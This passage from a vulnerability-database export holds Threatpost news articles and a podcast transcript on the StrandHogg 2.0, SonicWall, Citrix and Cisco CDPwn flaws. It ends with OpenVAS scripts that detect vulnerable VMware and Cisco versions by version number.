malware could do if exploited in the wild \u2013 possibly exposing Android users\u2019 mobile banking credentials and access one-time-passwords sent via SMS,\u201d said Sam Bakken, senior product marketing manager at OneSpan, via email.\n\nStrandHogg 2.0 attacks are also more difficult to detect, researchers wrote.\n\n\u201cAttackers exploiting StrandHogg have to explicitly and manually enter the apps they are targeting into Android Manifest, with this information then becoming visible within an XML file which contains a declaration of permissions, including what actions can be executed,\u201d they explained. 
\u201cThis declaration of required code, which can be found within the Google Play store, is not the case when exploiting StrandHogg 2.0.\u201d\n\nAttackers can further hide their activities due to the fact that StrandHogg 2.0 requires root access or external configuration, and code obtained from Google Play will not initially appear suspicious to developers and security teams.\n\nNo attacks have thus far been seen in the wild, but researchers theorize that it\u2019s only a matter of time before they appear. Promon said that it expects threat actors to use both the original StrandHogg bug and the new version together, in order to broaden their attack surface: Many of the mitigations that can be executed against StrandHogg do not apply to StrandHogg 2.0, and vice-versa.\n\n\u201cWe see StrandHogg 2.0 as StrandHogg\u2019s even more evil twin,\u201d said Tom Lysemose Hansen, CTO at Promon. \u201cAttackers looking to exploit StrandHogg 2.0 will likely already be aware of the original StrandHogg vulnerability and the concern is that, when used together it becomes a powerful attack tool for malicious actors.\u201d\n\nGoogle [has issued a patch](<https://threatpost.com/google-android-rce-bug-full-device-access/155460/>) for Android versions 9, 8.1 and 8, but users on earlier versions (representing 39.2 percent of Android devices, researchers said) will remain vulnerable. 
StrandHogg 2.0 exploits do not impact devices running Android 10, so users should update their devices to the latest firmware in order to protect themselves from attacks.\n\n\u201cWith a significant proportion of Android users reported to still be running older versions of the OS, a large percentage of the global population is still at risk,\u201d the researchers said.\n\nIn fact, according to data from Google, as of April 2020, 91.8 percent of Android active users worldwide are on version 9.0 or earlier: Pie (2018), Oreo (2017), Nougat (2016), Marshmallow (2015), Lollipop (2014), KitKat (2013), Jellybean (2012) and Ice Cream Sandwich (2011).\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-26T21:03:10", "type": "threatpost", "title": "StrandHogg 2.0 Critical Bug Allows Android App Hijacking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0096", "CVE-2020-5135"], "modified": "2020-05-26T21:03:10", "id": "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "href": "https://threatpost.com/strandhogg-2-critical-bug-android-app-hijacking/156058/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-23T17:55:37", "description": "UPDATE\n\nAn October patch [for a critical remote code execution (RCE) bug in a SonicWall VPN](<https://threatpost.com/critical-sonicwall-vpn-bug/160108/>) appliance turned out to be insufficient. While the patch closed the RCE attack vector, more than 800,000 devices were still vulnerable to an additional memory-leak flaw for months, according to researchers.\n\nSonicWall originally patched the stack-based buffer overflow vulnerability in the SonicWall Network Security Appliance (NSA), tracked as [CVE-2020-5135](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>), back in October.\n\nHowever, Craig Young, a computer security researcher with Tripwire\u2019s Vulnerability and Exposures Research Team (VERT), said the initial patch for the vulnerability was \u201cbotched,\u201d needing a \u201cone- or two-line fix\u201d to be complete, he wrote in a [report](<https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/>) published Tuesday, which details the specifics of where the fix went wrong.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2021-20019](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0006>)), not addressed by the initial October patch, is described in a security bulletin published Tuesday as, 
\u201cA vulnerability in SonicOS where the HTTP server response leaks partial memory by sending a crafted unauthenticated HTTP request. This can potentially lead to an internal sensitive data disclosure vulnerability.\u201d\n\nIn a statement sent to Threatpost, SonicWall said:\n\n_\u201cSonicWall is active in collaborating with third-party researchers, security vendors and forensic analysis firms to ensure its products meet or exceed expected security standards. Through the course of this practice, SonicWall was made aware of, verified, tested and patched a non-critical buffer overflow vulnerability that impacted versions of SonicOS. SonicWall is not aware of this vulnerability being exploited in the wild. As always, SonicWall strongly encourages organizations maintain patch diligence for all security products.\u201d _\n\nThe initial bug has a CVSS severity rating of 9.4. The vulnerability highlighted by Tripwire has a medium CVSS severity rating of 5.3.\n\nThough SonicWall was aware of the problem soon after the fix was released, it only released a complete patch this week, Young wrote.\n\n\u201cI had expected that a patch would probably come out quickly but, fast-forward to March and I still had not heard back,\u201d he wrote. 
\u201cI reconnected with their PSIRT [Product Security Incident Response Team] on March 1, 2021, for an update, but ultimately it took until well into June before an advisory could be released.\u201d\n\n## **Where It Went Wrong**\n\nYoung and Nikita Abramov, application analysis specialist at Positive Technologies (PT), were credited back in October with finding the flaw, which exists within the HTTP/HTTPS service used for product management and SSL VPN remote access.\n\nThe vulnerability could allow an unskilled attacker to trigger a persistent denial-of-service (DoS) condition using an unauthenticated HTTP request involving a custom protocol handler, as well as spread further damage, Young wrote in his [analysis](<https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/>) at the time.\n\nAbramov and Young both reported the bug to SonicWall around the same time in late September, and the company gave Young a date of Oct. 5 for a patch to resolve the problem. That date later was pushed up to Oct. 14, he said, which is when SonicWall also acknowledged to Threatpost that it had indeed issued a patch for the flaw.\n\nHowever, after the patch was released, Young tested a SonicWall VPN on Microsoft Azure to confirm how it responded to a proof-of-concept exploit he\u2019d devised for the flaw and found that it was still vulnerable. However, though it did not crash the system, the exploit payload did trigger a flood of binary data in response, he wrote, providing a screenshot of the result in his analysis.\n\n\u201cAs you can see from the screenshot, there are values in the binary data which certainly look like they could be memory addresses,\u201d Young wrote. \u201cAlthough I never observed recognizable text in the leaked memory, I believe this output could vary based on how the target system is used. 
I also suspect that the values in my output are in fact memory addresses which could be a useful information leak for exploiting an RCE bug.\u201d\n\nYoung\u2019s final assessment of his test was that the fix was incomplete, he said. \u201cThe unbounded string copy was replaced with an appropriate memory safe function, but the return value was not properly considered,\u201d he wrote.\n\n## **Delayed Security Advisory**\n\nYoung reported his findings to SonicWall PSIRT on Oct. 6 and followed up several times before receiving a response on Oct. 9 that \u201cconfirmed my expectation that this was the result of an improper fix for CVE-2020-5135, and told me that the patched firmware versions had already started to become available on mysonicwall.com as well as via Azure,\u201d he wrote.\n\nSix days later, Young said he received a response from the company that he would be informed when the memory-dump issue he identified was resolved and ready for release. He followed up again in March when he still had not heard back, he said.\n\nUltimately, it would take until this Wednesday, June 22, before SonicWall would publicly post [the advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0010>) for the updated patch to the vulnerability, Young wrote.\n\nThe security advisory also patches a number of other bugs in SonicWall platforms, a complete list of which is available in both the company\u2019s post and Young\u2019s analysis.\n\n_(This article was updated on 6/23 at 12:30 p.m. ET to reflect additional reporting on a portion of a vulnerability not addressed by SonicWall\u2019s October patch. A clarification was also made to more clearly indicate that SonicWall\u2019s initial patch did mitigate the RCE bug. The article also includes a statement from SonicWall.) 
_\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-23T10:44:07", "type": "threatpost", "title": "SonicWall 'Botches' October Patch for VPN Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2021-20019"], "modified": "2021-06-23T10:44:07", "id": "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "href": "https://threatpost.com/sonicwall-botches-critical-vpn-bug/167152/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:27:01", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. 
The U.S. accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. 
The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. 
That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "cvss3": {}, "published": "2019-12-26T19:17:55", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:31:47", "description": "Researchers on Wednesday disclosed five critical vulnerabilities in Cisco Discovery Protocol (CDP), the Cisco-proprietary Layer 2 network protocol that is used to discover information about locally attached Cisco equipment.\n\nResearchers say that the vulnerabilities, which they collectively call CDPwn, can allow attackers to remotely take over millions of devices. The flaws specifically exist in the parsing of CDP packets, in the protocol implementation for various Cisco products, from its software to IP cameras. 
Cisco issued patches on Wednesday addressing the five flaws, and is urging users to update as soon as possible.\n\nThreatpost talked to Ben Seri, VP of Research at Armis, who discovered the flaws, about the CDPwn flaws, their impact, and why Layer 2 protocols are an under-researched area.\n\n**[Listen to the full podcast below, or download direct here](<http://traffic.libsyn.com/digitalunderground/cisco_flaw_podcast.mp3>).**\n\n_Below is a lightly-edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell-Welch**: Hi, everyone, welcome back to the Threatpost podcast. You\u2019ve got Lindsey O\u2019Donnell-Welch with Threatpost here. And I\u2019m joined today by Ben Seri, the VP of research at Armis, to discuss some newly disclosed vulnerabilities that have been found in Cisco equipment. So Ben, thank you so much for joining.\n\n**Ben Seri:** Thank you.\n\n**LO:** So Armis discovered five vulnerabilities that were disclosed today. And those are stemming from the Cisco Discovery Protocol, aka CDP, which is the info sharing layer that maps all Cisco equipment on a network. And you guys collectively called these flaws CDPwn. So just to start, tell us some more deep in depth about what is the Cisco Discovery Protocol, just for some context here.\n\n**BS:** Sure. Yes, so Cisco makes network appliances. And so from time to time, they invent these protocols that are then used by every product that they produce. And CDP is one of these protocols. It\u2019s a Discovery Protocol, as you mentioned, it\u2019s simply a way for Cisco devices to find one another in a network. 
It\u2019s a protocol that works simply with multicast [frames], or what is called broadcast, packets that are sent in the clear, inside the network. And every device, Cisco device, sends packets from time to time saying, \u2018Hi, my IP address is this, My name is this, my operating system is this\u2019 and all kinds of information and they collect the Cisco devices\u2019 information about one another, about their neighbors. And then when you have all kinds of Cisco management products, you\u2019re able to view all the Cisco devices in your network. So it\u2019s mainly about convenience. There are not many functional features other than convenience related that use CDP. But it\u2019s nevertheless enabled by default on all of Cisco products, in some of their products you can\u2019t actually turn it off. It\u2019s something that just remains on all the time. And like any protocol it introduces an attack surface that might contain vulnerabilities, like the ones that we found in this occasion.\n\n**LO:** Right. And that\u2019s really interesting that this can\u2019t be turned off as a function in certain devices. And I know that in your research, you mentioned this is something that\u2019s implemented in virtually all Cisco products from switches to routers to IP phones and IP cameras. So can you speak a little bit about the threat attack surface here and the level of devices that could be impacted by this?\n\n**BS:** Yeah so CDP, one of its interesting aspects is that it\u2019s a layer 2 protocol. It\u2019s something that is just very low in the stack, very basic in how the network, the packets are built from this protocol, and it\u2019s actually a layer where researchers don\u2019t look at too much. 
Most of the vulnerabilities are either in application layer, in rare cases they are the transportation layer, transport layer; and then, what is called the data link layer, or the layer 2, is where you have dozens of protocols, used by network appliances, switches and routers. And these are kind of an attack surface that is not enough researched.\n\nCisco Discovery Protocol is one of these and the vulnerabilities themselves are critical. When we found them, they were not known to Cisco or any other individual as far as we know. And we\u2019ve worked with Cisco on the patch mitigation process. And so when we are announcing this today, customers of Cisco are advised to go ahead and install the patches as quickly as possible.\n\nAnd so you asked about the wide array of devices impacted by this and that\u2019s true; you find this in the Cisco switches and routers; IP phones from Cisco; and these are devices that have a complete hold on the market in these fields. When you look at IP phones, for example, Cisco advertises that over 95 percent of Fortune 500 companies use Cisco communication solutions. So that these are the Cisco IP phones, for example, and you would find them in government offices and you\u2019d find them in the White House, and in the Situation Room, but also throughout corporate and trade floors and whatever. They\u2019re really prevalent devices.\n\nThat\u2019s the IP phone but Cisco network equipment, the switches and the routers, are very, very popular as well and the impact is severe in terms of what kind of attacks attackers can actually pull off using these vulnerabilities.\n\n**LO:** And I want to talk about that in a second. But I just wanted to ask you real quick, you mentioned before that CDP, there hasn\u2019t been a whole lot of research around it. I wanted to ask you how you first came across these vulnerabilities and what caused you to look further into CDP as a potential threat surface for vulnerabilities. 
Because as you said, it usually is kind of the application layers and some other areas that vulnerabilities are discovered in, so how did you first come across these flaws?\n\n**BS:** Yeah so actually, what piqued our interest for looking into this was a Cisco security advisory published around two years ago, that detailed some vulnerabilities that they found in LDP, which is another Discovery Protocol \u2013 not CDP protocol \u2013 but another Discovery Protocol, pretty similar to CDP. And this advisory mentioned that Cisco found some bugs that could lead to denial of service in a wider array of devices. And although this wasn\u2019t what is called RCE vulnerability, or remote code execution, what they discovered was some sort of buffer overflow. And we felt that if they internally found something that actually parses these packets, the LDP packets, in a way that can lead to vulnerabilities, then we might find similar stuff that can lead to critical vulnerabilities.\n\nAnd really the reason that we looked at it, other than this initial lead we had through Cisco\u2019s advisory, was the understanding that an attacker that has a vulnerability in these types of protocols has the ability to break network segmentation. Part of what we do is to try to understand the havoc that IoT devices might have on networks. And network segmentation is actually a very basic design tool for networks to prevent certain devices, such as IoT devices, from crossing the bounds over from the IoT segment into corporate segments. And in CDP and LDP, and these discovery protocols, layer 2 protocols, they\u2019re actually parsed by the network of clients, regardless of the segment, regardless of if the device connected to it is an IoT segment, or in the corporate segment. 
So yeah, the understanding here was \u201cokay, this is interesting,\u201d Cisco found something in LDP, this would mean an IoT device could attack the switch even if it\u2019s segmented, then having access to this switch, it can move over to other segments. So that was our motivation to try and understand if this attack surface might contain vulnerabilities, like the ones eventually that we found.\n\n**LO:** Right. And that was for me a huge highlight from the research was that because the network infrastructure itself was at risk and exploitable that network segmentation, which is usually a big security strategy is at risk now. So I thought that was a big implication here.\n\nI wanted to focus in on the five vulnerabilities that are kind of at the heart of this and there were four remote code execution flaws and then one denial of service flaw. So can you talk a little bit more about these vulnerabilities and what an attacker would need to exploit them, how difficult they are to exploit and if there is one vulnerability that\u2019s particularly severe or easier than the others to exploit.\n\n**BS:** So unfortunately, the vulnerabilities themselves are not that complicated. There are standard buffer overflows that you would find, bugs you will find from time to time, and exploiting them takes some effort, but actually, it\u2019s not that difficult. There are some mitigations in these devices to make it harder for attackers to actually exploit the vulnerabilities but they are not that difficult to bypass. So there are the four RCEs, the denial of service one is also something with a few CDP packets maliciously crafted, an attacker can take down switches and routers, and completely stop their functionality. 
And the RCE ones are just a matter of sending a couple of packets to the affected devices in order to gain code execution on your devices.\n\nI would say that the most severe of these four is the one that affects IP phones; they have an additional bug other than the memory corruption part. They parse broadcast CDP packets and unicast CDP packets as if they were regular standard CDP packets, which are normally very specific multicast packets. And that means for attackers that you don\u2019t need to find the IP phone that you want to target inside the network, you can simply send a broadcast packet that will go out to the entire network. And the IP phones that are affected by this will parse these packets that would otherwise be regarded as invalid packets. They would parse them nonetheless and the vulnerability will be triggered on them almost simultaneously throughout the network. The attacker can send one broadcast packet, it will either cause denial of service or code execution, depending on the exploit. And then you will have an army of IP phones in the network that you can either eavesdrop on the calls from, carry out additional attacks from, or steal sensitive data from.\n\nIP phones are really the most enterprise grade type of IoT device that you would have in a network; Cisco is an enterprise-oriented company. But nevertheless, they might be vulnerable. And they do contain confidential data and they might also be used as a way to have a hold inside the network, to carry out further attacks from them. And the most interesting part is that they are really, really prevalent.\n\n**LO:** And just to clarify for our listeners, that vulnerability is, I believe it was tied to CVE-2020-3111. So that\u2019s the one that specifically impacts the Cisco IP phones and is an RCE and denial of service flaw, but I could definitely see that one being severe. So can you walk us through the potential impact of these vulnerabilities if exploited? 
I know there\u2019s kind of a lot to unwind there; you talked earlier about the issues that it could cause for network segmentation, but then also, there were issues around data exfiltration attacks and some other attacks. So can you walk us through that?\n\n**BS:** Yeah, so the first point for an attacker to take advantage of the vulnerability is to have some foothold inside the network. So it\u2019s not an attack that necessarily is coming from the internet. The attacker needs to have some access, but if you have some very low grade IoT device sitting inside the network, part of your threat model already is that these devices might be compromised. But really, what protects you today, what is used to protect you from these devices running havoc on your network, is network segmentation. So the threat is that once the compromised IoT device tries to exploit CDPwn, it can target the switch that it is connected to, and then from the switch all kinds of attacks can be carried out. It\u2019s a very good position for an attacker to be in. It allows him to capture traffic that traverses through the switch. If it\u2019s plaintext traffic, that might include confidential data, anything that\u2019s of value for the attacker. It\u2019s also a point where an attacker can carry out man-in-the-middle attacks if the device inside the network is going out to the internet to a specific service, or internally to a service inside the network. The attacker can change the traffic that traverses through the switch in a way that the man-in-the-middle attack might be beneficial for him; it can be used to send malware inside specific JavaScript code that is rendered in the browser or anything of that sort. There are a multitude of attacks that are very efficient once you have a man-in-the-middle position inside the network.\n\nBut then, you can also move laterally; the segmentation that previously limited these attacks only to the IoT segment is now no longer in place. 
Inside the switch, you can go to any segments that you\u2019d like. Or it can completely put all the devices in one segment and they can now also talk to one another, although originally they were on separate segments. Last, there is also the impact to IP phones and IP cameras. And like I mentioned, for example, on the IP phones, they are vulnerable to the broadcast attack as well, so from the switch, you can also send the broadcast CDP packet that will trigger the vulnerabilities on the IP phones, and that would be the next step, getting access to these corporate assets that might contain confidential data. And all from a very strong position inside the network, the core space, or any other switch inside the network that is not regularly examined; you don\u2019t expect these types of devices to be compromised. And for that reason, they\u2019re not monitored and not tracked as much as your corporate assets.\n\n**LO:** Right. And I mean, speaking of corporate assets, you know, like you mentioned before, many times, you know, a lot of these devices are used primarily by enterprises. And that kind of heightens these types of attacks and their severity, like man-in-the-middle, like data exfiltration, and kind of what that means for enterprise organizations that might be open to these types of threats. What can enterprise organizations do to secure against this type of attack?\n\n**BS:** Monitoring these types of devices, treating them as endpoints that might be compromised as well, not only the Windows devices and the mobile devices. We are aware that consumer grade IoT, whether it\u2019s an Amazon Echo, or some tablet of sorts or anything of that nature, we see these devices as IoT, and we have learned that these might be compromised. And there is a growing consensus that securing these types of devices is needed. 
But when you try to define IoT, it really has no bounds; any device, any embedded device that does not have an end security agent on it, in some ways, it\u2019s an IoT device. So for every organization, it looks like a benign device, the pipeline of the network, something of that sort, but it can also be vulnerable, attackers can attack it as well. And having attacked it they can use it as a foothold inside the network to carry out additional attacks.\n\nSo the VoIP phones and enterprise grade IP cameras from Cisco, these are also at the end of the day computers that parse packets, might be vulnerable to attacks, and can be used for further attacks. I think the solution is always to find a product that monitors all types of these unmanaged devices in a way that can detect if something wrong has occurred, if something out of normal behavior has occurred. But also obviously, whenever a vulnerability is published, quickly patch; that\u2019s the best way to stay secure.\n\n**LO:** Right. And I know you spoke a little bit about IoT security. And it seems like that is also kind of a big part of this research, how IoT security issues and connected device issues, the impact that they can have on corporate networks. Because when you think about it, a lot of businesses have all kinds of devices that have popped up over the years that are connected, that they don\u2019t even necessarily think of, like surveillance cameras, etc, etc. So that\u2019s a really good point as well. And finally I wanted to ask you about the process of disclosure with Cisco and the patches that have been deployed at this point; what was the process of disclosure in terms of the time frame and the patches that are available now?\n\n**BS:** It was rather a long process. But part of that was how this disclosure went about. So at the end of August, we first disclosed the vulnerabilities; at the time we found them on the Nexus switches and IOS XR routers. 
And Cisco was very good to work with and they developed patches quickly. But then, during the disclosure, we actually found that similar vulnerabilities exist in IP phones and cameras. And for that reason the disclosure process went a bit longer, way over 100 days. And yes, patches have been deployed by Cisco; some of the upgrades to these devices have already been put out by Cisco. But today, they are also publishing their security advisories that mention what versions are patched and the different patches; the affected devices are being released today as well.\n\n**LO:** Are there any other takeaways from your research into CDPwn, or the vulnerabilities or implications here, that you want to mention from your perspective, Ben?\n\n**BS:** Um, yeah, I think that when we look at the network, when we look at all of the variety of devices that we have, any of the devices that are unmanaged, we need to look at them in the same way; they\u2019re not different. All of them are computers that might be open to attack. That\u2019s one hand, and the other end of it is the attack surface. There are just endless types of layer 2 protocols and CDP is one of them. But there is actually a very large attack surface there that has been neglected. But I think the research community needs to do more in looking at these protocols. And network segmentation, at the end of the day, is a strong solution for IoT, and other security problems are solved by it, but we need to make sure that it really stands strong against all kinds of attacks. CDPwn is just one of them. So looking at these protocols, understanding whether they present a risk to network appliances, is essential for that process to be as strong as it can be.\n\n**LO:** Absolutely. 
Well, Ben, thank you so much for coming onto the Threatpost podcast today to talk about these newly disclosed vulnerabilities in Cisco equipment.\n\n**BS:** Thank you for having me.\n\n**LO:** And once again, this is Lindsay O\u2019Donnell-Welch with Threatpost here talking today with Ben Seri, VP of research at Armis. Catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-02-05T16:00:56", "type": "threatpost", "title": "Critical Cisco 'CDPwn' Protocol Flaws Explained: Podcast", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3111", "CVE-2020-5135"], "modified": "2020-02-05T16:00:56", "id": "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "href": "https://threatpost.com/behind-cdpwn-discovering-critical-cisco-protocol-flaws/152530/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# 
Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. 
Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! 
build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 